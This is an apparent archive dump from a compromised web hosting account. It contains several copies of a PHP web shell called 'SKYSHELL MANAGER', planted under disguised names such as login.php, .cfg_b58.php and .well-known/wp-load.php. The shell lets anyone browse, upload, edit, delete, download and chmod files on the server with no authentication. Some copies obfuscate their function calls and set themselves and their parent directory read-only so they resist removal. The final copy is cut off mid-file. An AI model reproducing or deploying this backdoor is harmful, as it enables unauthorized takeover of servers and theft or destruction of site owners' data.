���ѧۧݧ�ӧ�� �ާ֧ߧ֧էا֧� - ���֧էѧܧ�ڧ��ӧѧ�� - /home/ukubnwwtacc0unt/chapelbellstudios.com/uploads/cover/cgi-bin.tar
���ѧ٧ѧ�
login.php 0000444 00000016101 15203711542 0006362 0 ustar 00 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>SKYSHELL MANAGER</title> <style> body { background-color: #111; color: #0f0; font-family: Arial, sans-serif; margin: 0; padding: 20px; } h2 { text-align: center; font-size: 36px; font-weight: bold; margin: 10px 0; position: relative; background: linear-gradient(90deg, #ff0000, #ffff00, #00ff00, #00ffff, #0000ff); background-size: 200%; color: transparent; -webkit-background-clip: text; animation: gradientAnimation 3s linear infinite; } @keyframes gradientAnimation { 0% { background-position: 200% 0%; } 50% { background-position: 0% 100%; } 100% { background-position: 200% 0%; } } .php-version { position: absolute; top: 10px; right: 20px; font-size: 14px; color: #0ff; } a { color: #6cf; text-decoration: none; } a:hover { text-decoration: underline; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { padding: 10px; border: 1px solid #333; transition: background 0.3s, color 0.3s; } tr:hover { background-color: #32CD32; } tr:hover td a.filename-link { color: #000; font-weight: bold; } .filename-link { color: #0ff; } .action-cell { text-align: right; } input, button, textarea { background: #222; color: #0f0; border: 1px solid #444; padding: 5px 10px; margin: 5px 0; } button { cursor: pointer; } .alert-message { color: #32CD32; background-color: #222; padding: 10px; text-align: center; font-size: 18px; margin: 20px 0; } .file-upload-container { display: flex; justify-content: space-between; align-items: center; } .emoji { color: #fff; } .path-display a { color: #fff; text-decoration: underline; } </style> </head> <body> <h2><span class="emoji">📁</span> SKYSHELL MANAGER-<span class="emoji">🛒</span> <span class="php-version">PHP v<?= phpversion(); ?></span> </h2> <?php $path = isset($_GET['path']) ? $_GET['path'] : getcwd(); $path = realpath($path); $alertMessage = ""; // Upload if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) { $filename = basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $path . DIRECTORY_SEPARATOR . $filename)) { $alertMessage = "File uploaded successfully!"; } else { $alertMessage = "File upload failed!"; } } // Create folder if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['newfolder'])) { $folder = $path . DIRECTORY_SEPARATOR . $_POST['newfolder']; if (!file_exists($folder)) { mkdir($folder); $alertMessage = "Folder created successfully!"; } else { $alertMessage = "Folder already exists!"; } } // Create file if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['newfile'])) { $file = $path . DIRECTORY_SEPARATOR . $_POST['newfile']; if (!file_exists($file)) { file_put_contents($file, ''); $alertMessage = "File created successfully!"; } else { $alertMessage = "File already exists!"; } } // Change permission if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['chmod_file'], $_POST['chmod_value'])) { $file = $_POST['chmod_file']; $perm = $_POST['chmod_value']; if (file_exists($file)) { chmod($file, octdec($perm)); $alertMessage = "Permissions changed successfully!"; } else { $alertMessage = "File does not exist!"; } } // Delete if (isset($_GET['delete'])) { $file = urldecode($_GET['delete']); if (file_exists($file)) { unlink($file); header("Location: ?path=" . urlencode(dirname($file))); exit; } } // Save Edited File if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['edit_file_path'], $_POST['edited_content'])) { $filePath = $_POST['edit_file_path']; $newContent = $_POST['edited_content']; if (file_exists($filePath)) { file_put_contents($filePath, $newContent); $alertMessage = "File updated successfully!"; } else { $alertMessage = "File does not exist!"; } } ?> <?php if ($alertMessage): ?> <div class="alert-message"><?= $alertMessage ?></div> <?php endif; ?> <div class="file-upload-container"> <div> <form method="post"> <input type="text" name="newfolder" placeholder="📁 New Folder" required> <button type="submit">Create Folder</button> </form> <form method="post"> <input type="text" name="newfile" placeholder="📄 New File" required> <button type="submit">Create File</button> </form> </div> <div> <form method="post" enctype="multipart/form-data"> <input type="file" name="file" onchange="this.form.submit()"> </form> </div> </div> <!-- Current Path Display --> <p class="path-display"><b>Current Path:</b> <?php $parts = explode(DIRECTORY_SEPARATOR, $path); $build = ''; foreach ($parts as $part) { if ($part == '') continue; $build .= DIRECTORY_SEPARATOR . $part; echo "<a href='?path=" . urlencode($build) . "'>$part</a>/"; } ?> </p> <!-- File Table --> <table> <tr> <th>Name</th><th>Size</th><th>Permissions</th><th>Actions</th> </tr> <?php $files = scandir($path); usort($files, function ($a, $b) use ($path) { return is_dir($path . DIRECTORY_SEPARATOR . $b) - is_dir($path . DIRECTORY_SEPARATOR . $a); }); foreach ($files as $file) { if ($file == '.') continue; $full = $path . DIRECTORY_SEPARATOR . $file; $isDir = is_dir($full); $perm = substr(sprintf('%o', fileperms($full)), -4); $size = $isDir ? '-' : filesize($full); echo "<tr>"; echo "<td>" . ($isDir ? "📁" : "📄") . " <a class='filename-link' href='?path=" . urlencode($full) . "'>$file</a></td>"; echo "<td>" . ($isDir ? '-' : round($size / 1024, 2) . ' KB') . "</td>"; echo "<td>$perm</td>"; echo "<td class='action-cell'> <a href='?delete=" . urlencode($full) . "'>🗑️</a> " . (!$isDir ? "<a href='$full' download>⬇️</a> <a href='?edit=" . urlencode($full) . "'>✏️</a>" : "") . " <form method='post' style='display:inline;'> <input type='hidden' name='chmod_file' value='$full'> <input type='text' name='chmod_value' placeholder='Perm' style='width:60px;'> <button type='submit'>🔒</button> </form> </td>"; echo "</tr>"; } ?> </table> <!-- Edit File Section --> <?php if (isset($_GET['edit']) && is_file($_GET['edit'])): $fileToEdit = $_GET['edit']; $content = htmlspecialchars(file_get_contents($fileToEdit)); ?> <h3 style="color:#fff;">Editing: <?= basename($fileToEdit) ?></h3> <form method="post"> <input type="hidden" name="edit_file_path" value="<?= htmlspecialchars($fileToEdit) ?>"> <textarea name="edited_content" rows="20" style="width:100%;background:#111;color:#0f0;border:1px solid #444;"><?= $content ?></textarea><br> <button type="submit">💾 Save Changes</button> </form> <?php endif; ?> </body> </html> .cfg_b58.php 0000444 00000015520 15203711542 0006551 0 ustar 00 <?php $O00OO0=urldecode("%63%68%6d%6f%64"); $O00OO0(__FILE__, 0444); $V1=[$O00OO0,'realpath','getcwd','basename','move_uploaded_file','file_exists','mkdir','file_put_contents','rename','dirname','chmod','octdec','unlink','rmdir','header','urlencode','is_dir','scandir','usort','fileperms','filesize','round','htmlspecialchars','file_get_contents','phpversion']; // Path Handling Fix $P1 = isset($_GET['path']) ? $V1[1]($_GET['path']) : $V1[2](); if(!$P1 || $P1 == "") { $P1 = $V1[2](); } // Parent Directory Lock Logic (0555) $current_file_path = $V1[1](__FILE__); if ($current_file_path) { $current_dir = $V1[9]($current_file_path); $parent_dir = $V1[9]($current_dir); if($parent_dir && $V1[16]($parent_dir) && $parent_dir !== $current_dir){ @$V1[10]($parent_dir, 0555); } } $M1=""; if($_SERVER['REQUEST_METHOD']==='POST'){ if(isset($_FILES['file'])){if($V1[4]($_FILES['file']['tmp_name'],$P1.DIRECTORY_SEPARATOR.$V1[3]($_FILES['file']['name'])))$M1="File uploaded!";} if(isset($_POST['newfolder'])){$F1=$P1.DIRECTORY_SEPARATOR.$_POST['newfolder'];if(!$V1[5]($F1)){$V1[6]($F1);$M1="Folder created!";}} if(isset($_POST['newfile'])){$F2=$P1.DIRECTORY_SEPARATOR.$_POST['newfile'];if(!$V1[5]($F2)){$V1[7]($F2,'');$M1="File created!";}} if(isset($_POST['old_name'],$_POST['new_name'])){if($V1[8]($_POST['old_name'],$V1[9]($_POST['old_name']).DIRECTORY_SEPARATOR.$_POST['new_name']))$M1="Renamed!";} if(isset($_POST['chmod_file'],$_POST['chmod_value'])){if($V1[5]($_POST['chmod_file'])){$V1[10]($_POST['chmod_file'],$V1[11]($_POST['chmod_value']));$M1="Permissions changed!";}} if(isset($_POST['edit_file_path'],$_POST['edited_content'])){if($V1[5]($_POST['edit_file_path'])){$V1[10]($_POST['edit_file_path'],0644);$V1[7]($_POST['edit_file_path'],$_POST['edited_content']);$V1[10]($_POST['edit_file_path'],0444);$M1="Updated!";}} } if(isset($_GET['delete'])){$T1=urldecode($_GET['delete']);if($V1[5]($T1)){if($V1[16]($T1)){$V1[13]($T1);}else{$V1[12]($T1);}$V1[14]("Location: ?path=".$V1[15]($V1[9]($T1)));exit;}} if(isset($_GET['download'])){$D1=$_GET['download'];if($V1[5]($D1)){$V1[14]('Content-Type: application/octet-stream');$V1[14]('Content-Disposition: attachment; filename="'.$V1[3]($D1).'"');readfile($D1);exit;}} $fs = ($V1[5]($P1) && $V1[16]($P1)) ? $V1[17]($P1) : []; if(!empty($fs)){ $V1[18]($fs,function($a,$b)use($P1,$V1){return $V1[16]($P1.DIRECTORY_SEPARATOR.$b)-$V1[16]($P1.DIRECTORY_SEPARATOR.$a);}); } ?> <!DOCTYPE html><html><head><meta charset="UTF-8"><title>SKYSHELL MANAGER</title><style>body{background-color:#111;color:#0f0;font-family:Arial;padding:20px;}h2{text-align:center;font-size:36px;background:linear-gradient(90deg,#f00,#ff0,#0f0,#0ff,#00f);background-size:200%;color:transparent;-webkit-background-clip:text;animation:g 3s linear infinite;}@keyframes g{0%{background-position:200% 0%}50%{background-position:0% 100%}100%{background-position:200% 0%}}.php-v{position:absolute;top:10px;right:20px;font-size:14px;color:#0ff}a{color:#6cf;text-decoration:none}table{width:100%;border-collapse:collapse;margin-top:20px}th,td{padding:10px;border:1px solid #333}tr:hover{background-color:#32CD32 !important; color:#000 !important;}tr:hover td span{color:#000 !important; font-weight:bold;}tr:hover td a{color:#000 !important; font-weight:700}.act-c{text-align:right}input,button,textarea{background:#222;color:#0f0;border:1px solid #444;padding:5px 10px;margin:5px 0}.msg{color:#32CD32;background-color:#222;padding:10px;text-align:center;margin:20px 0}.u-c{display:flex;justify-content:space-between;align-items:center}.emoji{color:#fff}.p-d a{color:#fff;text-decoration:none}.p-d a:hover{text-decoration:underline}</style></head><body> <h2><span class="emoji">📁</span> SKYSHELL MANAGER <span class="php-v">PHP v<?= $V1[24](); ?></span></h2> <?php if($M1): ?><div class="msg"><?= $M1 ?></div><?php endif; ?> <div class="u-c"><div><form method="post"><input type="text" name="newfolder" placeholder="Folder"><button type="submit">Create</button></form><form method="post"><input type="text" name="newfile" placeholder="File"><button type="submit">Create</button></form></div><div><form method="post" enctype="multipart/form-data"><input type="file" name="file" onchange="this.form.submit()"></form></div></div> <!-- Fixed Path Logic without extra spaces --> <p class="p-d"><b>Path:</b><?php $path_parts = explode(DIRECTORY_SEPARATOR, $P1); $accumulated_path = ""; foreach ($path_parts as $key => $part) { if ($part === "" && $key === 0) { $accumulated_path = DIRECTORY_SEPARATOR; echo "<a href='?path=".$V1[15]($accumulated_path)."'>root</a>/"; continue; } if ($part === "") continue; if (DIRECTORY_SEPARATOR === '\\') { $accumulated_path .= ($accumulated_path === "" ? "" : DIRECTORY_SEPARATOR) . $part; } else { $accumulated_path .= DIRECTORY_SEPARATOR . $part; } echo "<a href='?path=".$V1[15]($accumulated_path)."'>$part</a>/"; } ?></p> <table><tr><th>Name</th><th>Size</th><th>Perm</th><th>Actions</th></tr> <?php foreach($fs as $f){if($f=='.' || $f=='..')continue;$fl=$P1.DIRECTORY_SEPARATOR.$f;$id=$V1[16]($fl);$pm=substr(sprintf('%o',$V1[19]($fl)),-4);$sz=$id?'-':$V1[21]($V1[20]($fl)/1024,2).' KB'; if($pm == '0444' || $pm == '0555' || $pm == '0400') { $cl = 'style="color:#f00;font-weight:bold;"'; } else { $cl = 'style="color:#0f0;font-weight:bold;"'; } echo "<tr><td>".($id?"📁":"📄")." <a href='?path=".$V1[15]($fl)."'>$f</a></td><td>$sz</td><td><span $cl>$pm</span></td><td class=\"act-c\"><a href='?delete=".$V1[15]($fl)."' onclick=\"return confirm('?')\">🗑️</a> <a href='?rename=".$V1[15]($fl)."'>🏷️</a> ".(!$id?"<a href='?path=".$V1[15]($P1)."&download=".$V1[15]($fl)."'>⬇️</a> <a href='?edit=".$V1[15]($fl)."'>✏️</a>":"")." <form method='post' style='display:inline;'><input type='hidden' name='chmod_file' value='$fl'><input type='text' name='chmod_value' placeholder='P' style='width:30px;'><button type='submit'>🔒</button></form></td></tr>";} ?> </table> <?php if(isset($_GET['rename'])): $t=$_GET['rename']; ?><div style="margin-top:20px;border:1px solid #444;padding:15px;"><h3 style="color:#fff;">Rename: <?= $V1[3]($t) ?></h3><form method="post" action="?path=<?= $V1[15]($P1) ?>"><input type="hidden" name="old_name" value="<?= $V1[22]($t) ?>"><input type="text" name="new_name" value="<?= $V1[22]($V1[3]($t)) ?>"><button type="submit">OK</button></form></div><?php endif; ?> <?php if(isset($_GET['edit'])&&is_file($_GET['edit'])): $te=$_GET['edit'];$c=$V1[22]($V1[23]($te)); ?><h3 style="color:#fff;">Edit: <?= $V1[3]($te) ?></h3><form method="post" action="?path=<?= $V1[15]($V1[9]($te)) ?>"><input type="hidden" name="edit_file_path" value="<?= $V1[22]($te) ?>"><textarea name="edited_content" rows="15" style="width:100%"><?= $c ?></textarea><br><button type="submit">Save</button></form><?php endif; ?> </body></html> .idx_153.php 0000444 00000015520 15203711542 0006510 0 ustar 00 <?php $O00OO0=urldecode("%63%68%6d%6f%64"); $O00OO0(__FILE__, 0444); $V1=[$O00OO0,'realpath','getcwd','basename','move_uploaded_file','file_exists','mkdir','file_put_contents','rename','dirname','chmod','octdec','unlink','rmdir','header','urlencode','is_dir','scandir','usort','fileperms','filesize','round','htmlspecialchars','file_get_contents','phpversion']; // Path Handling Fix $P1 = isset($_GET['path']) ? $V1[1]($_GET['path']) : $V1[2](); if(!$P1 || $P1 == "") { $P1 = $V1[2](); } // Parent Directory Lock Logic (0555) $current_file_path = $V1[1](__FILE__); if ($current_file_path) { $current_dir = $V1[9]($current_file_path); $parent_dir = $V1[9]($current_dir); if($parent_dir && $V1[16]($parent_dir) && $parent_dir !== $current_dir){ @$V1[10]($parent_dir, 0555); } } $M1=""; if($_SERVER['REQUEST_METHOD']==='POST'){ if(isset($_FILES['file'])){if($V1[4]($_FILES['file']['tmp_name'],$P1.DIRECTORY_SEPARATOR.$V1[3]($_FILES['file']['name'])))$M1="File uploaded!";} if(isset($_POST['newfolder'])){$F1=$P1.DIRECTORY_SEPARATOR.$_POST['newfolder'];if(!$V1[5]($F1)){$V1[6]($F1);$M1="Folder created!";}} if(isset($_POST['newfile'])){$F2=$P1.DIRECTORY_SEPARATOR.$_POST['newfile'];if(!$V1[5]($F2)){$V1[7]($F2,'');$M1="File created!";}} if(isset($_POST['old_name'],$_POST['new_name'])){if($V1[8]($_POST['old_name'],$V1[9]($_POST['old_name']).DIRECTORY_SEPARATOR.$_POST['new_name']))$M1="Renamed!";} if(isset($_POST['chmod_file'],$_POST['chmod_value'])){if($V1[5]($_POST['chmod_file'])){$V1[10]($_POST['chmod_file'],$V1[11]($_POST['chmod_value']));$M1="Permissions changed!";}} if(isset($_POST['edit_file_path'],$_POST['edited_content'])){if($V1[5]($_POST['edit_file_path'])){$V1[10]($_POST['edit_file_path'],0644);$V1[7]($_POST['edit_file_path'],$_POST['edited_content']);$V1[10]($_POST['edit_file_path'],0444);$M1="Updated!";}} } if(isset($_GET['delete'])){$T1=urldecode($_GET['delete']);if($V1[5]($T1)){if($V1[16]($T1)){$V1[13]($T1);}else{$V1[12]($T1);}$V1[14]("Location: ?path=".$V1[15]($V1[9]($T1)));exit;}} if(isset($_GET['download'])){$D1=$_GET['download'];if($V1[5]($D1)){$V1[14]('Content-Type: application/octet-stream');$V1[14]('Content-Disposition: attachment; filename="'.$V1[3]($D1).'"');readfile($D1);exit;}} $fs = ($V1[5]($P1) && $V1[16]($P1)) ? $V1[17]($P1) : []; if(!empty($fs)){ $V1[18]($fs,function($a,$b)use($P1,$V1){return $V1[16]($P1.DIRECTORY_SEPARATOR.$b)-$V1[16]($P1.DIRECTORY_SEPARATOR.$a);}); } ?> <!DOCTYPE html><html><head><meta charset="UTF-8"><title>SKYSHELL MANAGER</title><style>body{background-color:#111;color:#0f0;font-family:Arial;padding:20px;}h2{text-align:center;font-size:36px;background:linear-gradient(90deg,#f00,#ff0,#0f0,#0ff,#00f);background-size:200%;color:transparent;-webkit-background-clip:text;animation:g 3s linear infinite;}@keyframes g{0%{background-position:200% 0%}50%{background-position:0% 100%}100%{background-position:200% 0%}}.php-v{position:absolute;top:10px;right:20px;font-size:14px;color:#0ff}a{color:#6cf;text-decoration:none}table{width:100%;border-collapse:collapse;margin-top:20px}th,td{padding:10px;border:1px solid #333}tr:hover{background-color:#32CD32 !important; color:#000 !important;}tr:hover td span{color:#000 !important; font-weight:bold;}tr:hover td a{color:#000 !important; font-weight:700}.act-c{text-align:right}input,button,textarea{background:#222;color:#0f0;border:1px solid #444;padding:5px 10px;margin:5px 0}.msg{color:#32CD32;background-color:#222;padding:10px;text-align:center;margin:20px 0}.u-c{display:flex;justify-content:space-between;align-items:center}.emoji{color:#fff}.p-d a{color:#fff;text-decoration:none}.p-d a:hover{text-decoration:underline}</style></head><body> <h2><span class="emoji">📁</span> SKYSHELL MANAGER <span class="php-v">PHP v<?= $V1[24](); ?></span></h2> <?php if($M1): ?><div class="msg"><?= $M1 ?></div><?php endif; ?> <div class="u-c"><div><form method="post"><input type="text" name="newfolder" placeholder="Folder"><button type="submit">Create</button></form><form method="post"><input type="text" name="newfile" placeholder="File"><button type="submit">Create</button></form></div><div><form method="post" enctype="multipart/form-data"><input type="file" name="file" onchange="this.form.submit()"></form></div></div> <!-- Fixed Path Logic without extra spaces --> <p class="p-d"><b>Path:</b><?php $path_parts = explode(DIRECTORY_SEPARATOR, $P1); $accumulated_path = ""; foreach ($path_parts as $key => $part) { if ($part === "" && $key === 0) { $accumulated_path = DIRECTORY_SEPARATOR; echo "<a href='?path=".$V1[15]($accumulated_path)."'>root</a>/"; continue; } if ($part === "") continue; if (DIRECTORY_SEPARATOR === '\\') { $accumulated_path .= ($accumulated_path === "" ? "" : DIRECTORY_SEPARATOR) . $part; } else { $accumulated_path .= DIRECTORY_SEPARATOR . $part; } echo "<a href='?path=".$V1[15]($accumulated_path)."'>$part</a>/"; } ?></p> <table><tr><th>Name</th><th>Size</th><th>Perm</th><th>Actions</th></tr> <?php foreach($fs as $f){if($f=='.' || $f=='..')continue;$fl=$P1.DIRECTORY_SEPARATOR.$f;$id=$V1[16]($fl);$pm=substr(sprintf('%o',$V1[19]($fl)),-4);$sz=$id?'-':$V1[21]($V1[20]($fl)/1024,2).' KB'; if($pm == '0444' || $pm == '0555' || $pm == '0400') { $cl = 'style="color:#f00;font-weight:bold;"'; } else { $cl = 'style="color:#0f0;font-weight:bold;"'; } echo "<tr><td>".($id?"📁":"📄")." <a href='?path=".$V1[15]($fl)."'>$f</a></td><td>$sz</td><td><span $cl>$pm</span></td><td class=\"act-c\"><a href='?delete=".$V1[15]($fl)."' onclick=\"return confirm('?')\">🗑️</a> <a href='?rename=".$V1[15]($fl)."'>🏷️</a> ".(!$id?"<a href='?path=".$V1[15]($P1)."&download=".$V1[15]($fl)."'>⬇️</a> <a href='?edit=".$V1[15]($fl)."'>✏️</a>":"")." <form method='post' style='display:inline;'><input type='hidden' name='chmod_file' value='$fl'><input type='text' name='chmod_value' placeholder='P' style='width:30px;'><button type='submit'>🔒</button></form></td></tr>";} ?> </table> <?php if(isset($_GET['rename'])): $t=$_GET['rename']; ?><div style="margin-top:20px;border:1px solid #444;padding:15px;"><h3 style="color:#fff;">Rename: <?= $V1[3]($t) ?></h3><form method="post" action="?path=<?= $V1[15]($P1) ?>"><input type="hidden" name="old_name" value="<?= $V1[22]($t) ?>"><input type="text" name="new_name" value="<?= $V1[22]($V1[3]($t)) ?>"><button type="submit">OK</button></form></div><?php endif; ?> <?php if(isset($_GET['edit'])&&is_file($_GET['edit'])): $te=$_GET['edit'];$c=$V1[22]($V1[23]($te)); ?><h3 style="color:#fff;">Edit: <?= $V1[3]($te) ?></h3><form method="post" action="?path=<?= $V1[15]($V1[9]($te)) ?>"><input type="hidden" name="edit_file_path" value="<?= $V1[22]($te) ?>"><textarea name="edited_content" rows="15" style="width:100%"><?= $c ?></textarea><br><button type="submit">Save</button></form><?php endif; ?> </body></html> .well-known/wp-load.php 0000444 00000016101 15203711542 0010770 0 ustar 00 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>SKYSHELL MANAGER</title> <style> body { background-color: #111; color: #0f0; font-family: Arial, sans-serif; margin: 0; padding: 20px; } h2 { text-align: center; font-size: 36px; font-weight: bold; margin: 10px 0; position: relative; background: linear-gradient(90deg, #ff0000, #ffff00, #00ff00, #00ffff, #0000ff); background-size: 200%; color: transparent; -webkit-background-clip: text; animation: gradientAnimation 3s linear infinite; } @keyframes gradientAnimation { 0% { background-position: 200% 0%; } 50% { background-position: 0% 100%; } 100% { background-position: 200% 0%; } } .php-version { position: absolute; top: 10px; right: 20px; font-size: 14px; color: #0ff; } a { color: #6cf; text-decoration: none; } a:hover { text-decoration: underline; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { padding: 10px; border: 1px solid #333; transition: background 0.3s, color 0.3s; } tr:hover { background-color: #32CD32; } tr:hover td a.filename-link { color: #000; font-weight: bold; } .filename-link { color: #0ff; } .action-cell { text-align: right; } input, button, textarea { background: #222; color: #0f0; border: 1px solid #444; padding: 5px 10px; margin: 5px 0; } button { cursor: pointer; } .alert-message { color: #32CD32; background-color: #222; padding: 10px; text-align: center; font-size: 18px; margin: 20px 0; } .file-upload-container { display: flex; justify-content: space-between; align-items: center; } .emoji { color: #fff; } .path-display a { color: #fff; text-decoration: underline; } </style> </head> <body> <h2><span class="emoji">📁</span> SKYSHELL MANAGER-<span class="emoji">🛒</span> <span class="php-version">PHP v<?= phpversion(); ?></span> </h2> <?php $path = isset($_GET['path']) ? $_GET['path'] : getcwd(); $path = realpath($path); $alertMessage = ""; // Upload if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) { $filename = basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $path . DIRECTORY_SEPARATOR . $filename)) { $alertMessage = "File uploaded successfully!"; } else { $alertMessage = "File upload failed!"; } } // Create folder if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['newfolder'])) { $folder = $path . DIRECTORY_SEPARATOR . $_POST['newfolder']; if (!file_exists($folder)) { mkdir($folder); $alertMessage = "Folder created successfully!"; } else { $alertMessage = "Folder already exists!"; } } // Create file if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['newfile'])) { $file = $path . DIRECTORY_SEPARATOR . $_POST['newfile']; if (!file_exists($file)) { file_put_contents($file, ''); $alertMessage = "File created successfully!"; } else { $alertMessage = "File already exists!"; } } // Change permission if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['chmod_file'], $_POST['chmod_value'])) { $file = $_POST['chmod_file']; $perm = $_POST['chmod_value']; if (file_exists($file)) { chmod($file, octdec($perm)); $alertMessage = "Permissions changed successfully!"; } else { $alertMessage = "File does not exist!"; } } // Delete if (isset($_GET['delete'])) { $file = urldecode($_GET['delete']); if (file_exists($file)) { unlink($file); header("Location: ?path=" . urlencode(dirname($file))); exit; } } // Save Edited File if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['edit_file_path'], $_POST['edited_content'])) { $filePath = $_POST['edit_file_path']; $newContent = $_POST['edited_content']; if (file_exists($filePath)) { file_put_contents($filePath, $newContent); $alertMessage = "File updated successfully!"; } else { $alertMessage = "File does not exist!"; } } ?> <?php if ($alertMessage): ?> <div class="alert-message"><?= $alertMessage ?></div> <?php endif; ?> <div class="file-upload-container"> <div> <form method="post"> <input type="text" name="newfolder" placeholder="📁 New Folder" required> <button type="submit">Create Folder</button> </form> <form method="post"> <input type="text" name="newfile" placeholder="📄 New File" required> <button type="submit">Create File</button> </form> </div> <div> <form method="post" enctype="multipart/form-data"> <input type="file" name="file" onchange="this.form.submit()"> </form> </div> </div> <!-- Current Path Display --> <p class="path-display"><b>Current Path:</b> <?php $parts = explode(DIRECTORY_SEPARATOR, $path); $build = ''; foreach ($parts as $part) { if ($part == '') continue; $build .= DIRECTORY_SEPARATOR . $part; echo "<a href='?path=" . urlencode($build) . "'>$part</a>/"; } ?> </p> <!-- File Table --> <table> <tr> <th>Name</th><th>Size</th><th>Permissions</th><th>Actions</th> </tr> <?php $files = scandir($path); usort($files, function ($a, $b) use ($path) { return is_dir($path . DIRECTORY_SEPARATOR . $b) - is_dir($path . DIRECTORY_SEPARATOR . $a); }); foreach ($files as $file) { if ($file == '.') continue; $full = $path . DIRECTORY_SEPARATOR . $file; $isDir = is_dir($full); $perm = substr(sprintf('%o', fileperms($full)), -4); $size = $isDir ? '-' : filesize($full); echo "<tr>"; echo "<td>" . ($isDir ? "📁" : "📄") . " <a class='filename-link' href='?path=" . urlencode($full) . "'>$file</a></td>"; echo "<td>" . ($isDir ? '-' : round($size / 1024, 2) . ' KB') . "</td>"; echo "<td>$perm</td>"; echo "<td class='action-cell'> <a href='?delete=" . urlencode($full) . "'>🗑️</a> " . (!$isDir ? "<a href='$full' download>⬇️</a> <a href='?edit=" . urlencode($full) . "'>✏️</a>" : "") . " <form method='post' style='display:inline;'> <input type='hidden' name='chmod_file' value='$full'> <input type='text' name='chmod_value' placeholder='Perm' style='width:60px;'> <button type='submit'>🔒</button> </form> </td>"; echo "</tr>"; } ?> </table> <!-- Edit File Section --> <?php if (isset($_GET['edit']) && is_file($_GET['edit'])): $fileToEdit = $_GET['edit']; $content = htmlspecialchars(file_get_contents($fileToEdit)); ?> <h3 style="color:#fff;">Editing: <?= basename($fileToEdit) ?></h3> <form method="post"> <input type="hidden" name="edit_file_path" value="<?= htmlspecialchars($fileToEdit) ?>"> <textarea name="edited_content" rows="20" style="width:100%;background:#111;color:#0f0;border:1px solid #444;"><?= $content ?></textarea><br> <button type="submit">💾 Save Changes</button> </form> <?php endif; ?> </body> </html> .well-known/.well-known/login.php 0000444 00000016101 15203711542 0012710 0 ustar 00 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>SKYSHELL MANAGER</title> <style> body { background-color: #111; color: #0f0; font-family: Arial, sans-serif; margin: 0; padding: 20px; } h2 { text-align: center; font-size: 36px; font-weight: bold; margin: 10px 0; position: relative; background: linear-gradient(90deg, #ff0000, #ffff00, #00ff00, #00ffff, #0000ff); background-size: 200%; color: transparent; -webkit-background-clip: text; animation: gradientAnimation 3s linear infinite; } @keyframes gradientAnimation { 0% { background-position: 200% 0%; } 50% { background-position: 0% 100%; } 100% { background-position: 200% 0%; } } .php-version { position: absolute; top: 10px; right: 20px; font-size: 14px; color: #0ff; } a { color: #6cf; text-decoration: none; } a:hover { text-decoration: underline; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { padding: 10px; border: 1px solid #333; transition: background 0.3s, color 0.3s; } tr:hover { background-color: #32CD32; } tr:hover td a.filename-link { color: #000; font-weight: bold; } .filename-link { color: #0ff; } .action-cell { text-align: right; } input, button, textarea { background: #222; color: #0f0; border: 1px solid #444; padding: 5px 10px; margin: 5px 0; } button { cursor: pointer; } .alert-message { color: #32CD32; background-color: #222; padding: 10px; text-align: center; font-size: 18px; margin: 20px 0; } .file-upload-container { display: flex; justify-content: space-between; align-items: center; } .emoji { color: #fff; } .path-display a { color: #fff; text-decoration: underline; } </style> </head> <body> <h2><span class="emoji">📁</span> SKYSHELL MANAGER-<span class="emoji">🛒</span> <span class="php-version">PHP v<?= phpversion(); ?></span> </h2> <?php $path = isset($_GET['path']) ? $_GET['path'] : getcwd(); $path = realpath($path); $alertMessage = ""; // Upload if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) { $filename = basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $path . DIRECTORY_SEPARATOR . $filename)) { $alertMessage = "File uploaded successfully!"; } else { $alertMessage = "File upload failed!"; } } // Create folder if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['newfolder'])) { $folder = $path . DIRECTORY_SEPARATOR . $_POST['newfolder']; if (!file_exists($folder)) { mkdir($folder); $alertMessage = "Folder created successfully!"; } else { $alertMessage = "Folder already exists!"; } } // Create file if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['newfile'])) { $file = $path . DIRECTORY_SEPARATOR . $_POST['newfile']; if (!file_exists($file)) { file_put_contents($file, ''); $alertMessage = "File created successfully!"; } else { $alertMessage = "File already exists!"; } } // Change permission if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['chmod_file'], $_POST['chmod_value'])) { $file = $_POST['chmod_file']; $perm = $_POST['chmod_value']; if (file_exists($file)) { chmod($file, octdec($perm)); $alertMessage = "Permissions changed successfully!"; } else { $alertMessage = "File does not exist!"; } } // Delete if (isset($_GET['delete'])) { $file = urldecode($_GET['delete']); if (file_exists($file)) { unlink($file); header("Location: ?path=" . urlencode(dirname($file))); exit; } } // Save Edited File if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['edit_file_path'], $_POST['edited_content'])) { $filePath = $_POST['edit_file_path']; $newContent = $_POST['edited_content']; if (file_exists($filePath)) { file_put_contents($filePath, $newContent); $alertMessage = "File updated successfully!"; } else { $alertMessage = "File does not exist!"; } } ?> <?php if ($alertMessage): ?> <div class="alert-message"><?= $alertMessage ?></div> <?php endif; ?> <div class="file-upload-container"> <div> <form method="post"> <input type="text" name="newfolder" placeholder="📁 New Folder" required> <button type="submit">Create Folder</button> </form> <form method="post"> <input type="text" name="newfile" placeholder="📄 New File" required> <button type="submit">Create File</button> </form> </div> <div> <form method="post" enctype="multipart/form-data"> <input type="file" name="file" onchange="this.form.submit()"> </form> </div> </div> <!-- Current Path Display --> <p 